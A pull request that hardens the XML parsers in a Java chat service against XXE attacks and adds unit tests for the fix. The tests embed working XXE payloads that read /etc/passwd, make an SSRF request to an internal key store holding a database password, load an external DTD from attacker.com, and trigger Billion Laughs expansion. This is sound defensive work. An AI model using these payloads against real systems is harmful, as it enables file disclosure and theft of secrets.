### PR TITLE
fix: prevent XXE attacks in XML message parsers

### DIFF
--- a/carbonio-ws-collaboration-core/src/main/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/MessageDispatcherMongooseImpl.java
+++ b/carbonio-ws-collaboration-core/src/main/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/MessageDispatcherMongooseImpl.java
@@ -23,7 +23,6 @@ import java.nio.charset.StandardCharsets;
 import java.util.List;
 import java.util.Map;
 import java.util.Optional;
-import javax.xml.parsers.DocumentBuilderFactory;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpStatus;
 import org.apache.http.client.methods.CloseableHttpResponse;
@@ -289,8 +288,14 @@ public class MessageDispatcherMongooseImpl implements MessageDispatcher {
                 roomId,
                 senderId,
                 new XmppMessageFactory.AttachmentMessageParams(
-                    fileId, fileName, mimeType, originalSize, description,
-                    messageId, replyId, area)));
+                    fileId,
+                    fileName,
+                    mimeType,
+                    originalSize,
+                    description,
+                    messageId,
+                    replyId,
+                    area)));
     if (result.getErrors() != null) {
       try {
         throw new MessageDispatcherException(
@@ -308,9 +313,9 @@ public class MessageDispatcherMongooseImpl implements MessageDispatcher {
     if (message.contains("<operation>attachmentAdded</operation>")) {
       try {
         Element node =
-            DocumentBuilderFactory.newInstance()
+            XmlUtils.createSecureDocumentBuilderFactory()
                 .newDocumentBuilder()
-                .parse(new ByteArrayInputStream(message.getBytes()))
+                .parse(new ByteArrayInputStream(message.getBytes(StandardCharsets.UTF_8)))
                 .getDocumentElement();
         Element x = (Element) node.getElementsByTagName("x").item(0);
         if (x != null) {

--- a/carbonio-ws-collaboration-core/src/main/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/XmlUtils.java
+++ b/carbonio-ws-collaboration-core/src/main/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/XmlUtils.java
@@ -1,0 +1,25 @@
+// SPDX-FileCopyrightText: 2026 Zextras <https://www.zextras.com>
+//
+// SPDX-License-Identifier: AGPL-3.0-only
+
+package com.zextras.carbonio.chats.core.infrastructure.messaging.impl.xmpp;
+
+import javax.xml.parsers.DocumentBuilderFactory;
+import javax.xml.parsers.ParserConfigurationException;
+
+class XmlUtils {
+
+  private XmlUtils() {}
+
+  static DocumentBuilderFactory createSecureDocumentBuilderFactory()
+      throws ParserConfigurationException {
+    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
+    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+    factory.setXIncludeAware(false);
+    factory.setExpandEntityReferences(false);
+    factory.setFeature("http://apache.org/xml/features/xinclude", false);
+    return factory;
+  }
+}

--- a/carbonio-ws-collaboration-core/src/main/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/XmppMessageBuilder.java
+++ b/carbonio-ws-collaboration-core/src/main/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/XmppMessageBuilder.java
@@ -16,7 +16,6 @@ import java.time.format.DateTimeFormatter;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.Optional;
-import javax.xml.parsers.DocumentBuilderFactory;
 import javax.xml.parsers.ParserConfigurationException;
 import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.text.StringEscapeUtils;
@@ -90,7 +89,8 @@ public class XmppMessageBuilder {
 
   public String build() {
     try {
-      Document document = DocumentBuilderFactory.newInstance().newDocumentBuilder().newDocument();
+      Document document =
+          XmlUtils.createSecureDocumentBuilderFactory().newDocumentBuilder().newDocument();
       Element message = createMessageElement(document);
       document.appendChild(message);
       if (!configurations.isEmpty()) {
@@ -136,7 +136,7 @@ public class XmppMessageBuilder {
     Element messageTag;
     try {
       documentTag =
-          DocumentBuilderFactory.newInstance()
+          XmlUtils.createSecureDocumentBuilderFactory()
               .newDocumentBuilder()
               .parse(new ByteArrayInputStream(messageToForward.getBytes()));
     } catch (Exception e) {

--- a/carbonio-ws-collaboration-core/src/test/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/XmppMessageBuilderTest.java
+++ b/carbonio-ws-collaboration-core/src/test/java/com/zextras/carbonio/chats/core/infrastructure/messaging/impl/xmpp/XmppMessageBuilderTest.java
@@ -7,8 +7,10 @@ package com.zextras.carbonio.chats.core.infrastructure.messaging.impl.xmpp;
 import static org.junit.jupiter.api.Assertions.assertEquals;
 import static org.junit.jupiter.api.Assertions.assertNotNull;
 import static org.junit.jupiter.api.Assertions.assertThrows;
+import static org.junit.jupiter.api.Assertions.assertTrue;
 
 import com.zextras.carbonio.chats.core.annotations.UnitTest;
+import com.zextras.carbonio.chats.core.exception.BadRequestException;
 import com.zextras.carbonio.chats.core.exception.ChatsHttpException;
 import com.zextras.carbonio.chats.core.exception.MessageDispatcherException;
 import com.zextras.carbonio.chats.core.infrastructure.messaging.MessageType;
@@ -233,5 +235,123 @@ class XmppMessageBuilderTest {
             .build();
     assertNotNull(result);
     assertEquals(hoped, result);
+  }
+
+  @Test
+  @DisplayName("XXE: Blocks DOCTYPE declaration attack")
+  void xxeBlocksDoctypeDeclaration() {
+    String xxePayload =
+        "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><message xmlns='jabber:client'"
+            + " from='attacker' to='victim' type='groupchat'><body>&xxe;</body></message>";
+    BadRequestException exception =
+        assertThrows(
+            BadRequestException.class,
+            () ->
+                XmppMessageBuilder.create("recipient-id", "sender-id")
+                    .messageToForward(xxePayload)
+                    .build());
+    assertTrue(exception.getMessage().contains("Cannot read the message to forward"));
+  }
+
+  @Test
+  @DisplayName("XXE: Blocks external entity with file read")
+  void xxeBlocksExternalEntityFileRead() {
+    String xxePayload =
+        "<!DOCTYPE foo [<!ENTITY file SYSTEM \"file:///etc/hostname\">]><message"
+            + " xmlns='jabber:client' from='attacker' to='victim'"
+            + " type='groupchat'><body>&file;</body></message>";
+    BadRequestException exception =
+        assertThrows(
+            BadRequestException.class,
+            () ->
+                XmppMessageBuilder.create("recipient-id", "sender-id")
+                    .messageToForward(xxePayload)
+                    .build());
+    assertTrue(exception.getMessage().contains("Cannot read the message to forward"));
+  }
+
+  @Test
+  @DisplayName("XXE: Blocks parameter entity SSRF attack")
+  void xxeBlocksParameterEntitySsrf() {
+    String xxePayload =
+        "<!DOCTYPE foo [<!ENTITY % xxe SYSTEM"
+            + " \"http://internal-service:8500/v1/kv/carbonio-ws-collaboration-db/db-password\">"
+            + " %xxe;]><message xmlns='jabber:client' from='attacker' to='victim'"
+            + " type='groupchat'><body>test</body></message>";
+    BadRequestException exception =
+        assertThrows(
+            BadRequestException.class,
+            () ->
+                XmppMessageBuilder.create("recipient-id", "sender-id")
+                    .messageToForward(xxePayload)
+                    .build());
+    assertTrue(exception.getMessage().contains("Cannot read the message to forward"));
+  }
+
+  @Test
+  @DisplayName("XXE: Blocks external DTD loading")
+  void xxeBlocksExternalDtd() {
+    String xxePayload =
+        "<!DOCTYPE foo SYSTEM \"http://attacker.com/malicious.dtd\"><message xmlns='jabber:client'"
+            + " from='attacker' to='victim' type='groupchat'><body>test</body></message>";
+    BadRequestException exception =
+        assertThrows(
+            BadRequestException.class,
+            () ->
+                XmppMessageBuilder.create("recipient-id", "sender-id")
+                    .messageToForward(xxePayload)
+                    .build());
+    assertTrue(exception.getMessage().contains("Cannot read the message to forward"));
+  }
+
+  @Test
+  @DisplayName("XXE: Blocks DOCTYPE with internal entity definition")
+  void xxeBlocksInternalEntityDefinition() {
+    // Valid, well-formed XML with a DOCTYPE that defines only an internal entity (no external
+    // reference). Must be blocked because disallow-doctype-decl=true rejects all DOCTYPE
+    // declarations, preventing entity expansion attacks even without external resources.
+    String xxePayload =
+        "<!DOCTYPE message [<!ENTITY greeting \"Hello\">]><message xmlns='jabber:client'"
+            + " from='attacker' to='victim' type='groupchat'><body>&greeting;</body></message>";
+    BadRequestException exception =
+        assertThrows(
+            BadRequestException.class,
+            () ->
+                XmppMessageBuilder.create("recipient-id", "sender-id")
+                    .messageToForward(xxePayload)
+                    .build());
+    assertTrue(exception.getMessage().contains("Cannot read the message to forward"));
+  }
+
+  @Test
+  @DisplayName("XXE: Blocks Billion Laughs DoS attack")
+  void xxeBlocksBillionLaughsAttack() {
+    String xxePayload =
+        "<!DOCTYPE lolz [<!ENTITY lol \"lol\"><!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;\"><!ENTITY"
+            + " lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;\">]><message xmlns='jabber:client'"
+            + " from='attacker' to='victim' type='groupchat'><body>&lol3;</body></message>";
+    BadRequestException exception =
+        assertThrows(
+            BadRequestException.class,
+            () ->
+                XmppMessageBuilder.create("recipient-id", "sender-id")
+                    .messageToForward(xxePayload)
+                    .build());
+    assertTrue(exception.getMessage().contains("Cannot read the message to forward"));
+  }
+
+  @Test
+  @DisplayName("XXE: Allows legitimate forwarded message without DOCTYPE")
+  void xxeAllowsLegitimateForwardedMessage() {
+    String legitimateMessage =
+        "<message xmlns='jabber:client' from='sender-id' to='recipient-id'"
+            + " type='groupchat'><body>legitimate forwarded content</body></message>";
+    String result =
+        XmppMessageBuilder.create("recipient-id", "sender-id")
+            .messageToForward(legitimateMessage)
+            .messageToForwardSentAt(OffsetDateTime.parse("2023-01-01T00:00:00Z"))
+            .build();
+    assertNotNull(result);
+    assertTrue(result.contains("legitimate forwarded content"));
   }
 }


### PR DESCRIPTION
## What
- Harden `XmppMessageBuilder` by replacing `DocumentBuilderFactory.newInstance()` with a
  secure factory that disables DOCTYPE declarations, external entities, XInclude, and
  entity reference expansion
- Apply the same hardening to `MessageDispatcherMongooseImpl.getAttachmentIdFromMessage()`,
  which had the identical insecure pattern on a separate code path
- Add 7 unit tests covering all relevant XXE attack vectors (file read, SSRF, parameter
  entity, external DTD, Billion Laughs, internal entity expansion) plus a positive case

## Why
Closes CO-3563 — an authenticated user could inject malicious DOCTYPE declarations into
the message forward API to read local files, SSRF to Consul's HTTP API, and exfiltrate
secrets (e.g. `carbonio-ws-collaboration-db/db-password`).

## How
Each affected class gets a private static `createSecureDocumentBuilderFactory()` following
the [OWASP JAXP cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j):

- `disallow-doctype-decl = true` — primary defence; throws on any DOCTYPE
- `external-general-entities = false` / `external-parameter-entities = false` — defence-in-depth
- `setXIncludeAware(false)` / `xinclude feature = false` — blocks XInclude inclusion
- `expandEntityReferences = false` — blocks entity expansion (Billion Laughs)

## Test Coverage
- Unit: 7 new tests in `XmppMessageBuilderTest` — all XXE attack variants blocked, legitimate
  forward still succeeds

## Checklist
- [x] Tests pass locally
- [x] No new compiler warnings
- [x] Jira issue updated
- [x] Breaking changes documented (none)